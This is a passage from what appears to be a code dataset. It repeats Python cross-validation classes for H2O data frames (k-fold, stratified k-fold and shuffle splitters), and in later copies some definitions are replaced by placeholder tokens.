n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\n<function token>\n<function token>\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass 